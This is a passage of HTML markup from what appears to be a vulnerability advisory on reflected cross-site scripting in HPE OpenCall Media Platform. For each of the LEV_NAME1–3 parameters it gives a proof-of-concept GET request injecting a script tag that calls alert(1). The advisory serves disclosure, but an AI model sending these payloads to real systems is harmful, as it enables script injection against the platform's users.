class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0037 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_NAME1<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NAME1 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;<strong>LEV_NAME1<\/strong>=N1f530e&#8221;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;d677f&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83653031266163\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1f530e&#8221;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;d677f&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83653031266163-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83653031266163-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83653031266163-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83653031266163-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83653031266163-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83653031266163-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83653031266163-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83653031266163-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83653031266163-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83653031266163-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83653031266163-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">N1f530e<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">d677f<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83653031266163-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83653031266163-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83653031266163-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83653031266163-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83653031266163-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83653031266163-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83653031266163-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83653031266163-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83653031266163-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0034 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_NAME2<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NAME2 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;<strong>LEV_NAME2<\/strong>=N261a9f&#8221;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;118f3&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83658779956306\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N261a9f&#8221;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;118f3&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83658779956306-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83658779956306-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83658779956306-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83658779956306-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83658779956306-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83658779956306-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83658779956306-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83658779956306-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83658779956306-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83658779956306-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83658779956306-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">N261a9f<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">118f3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83658779956306-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83658779956306-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83658779956306-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83658779956306-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83658779956306-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83658779956306-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83658779956306-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83658779956306-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83658779956306-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0032 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_NAME3<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NAME3 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;<strong>LEV_NAME3<\/strong>=N30c4b8&#8243;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;c10b2&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83665404695707\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 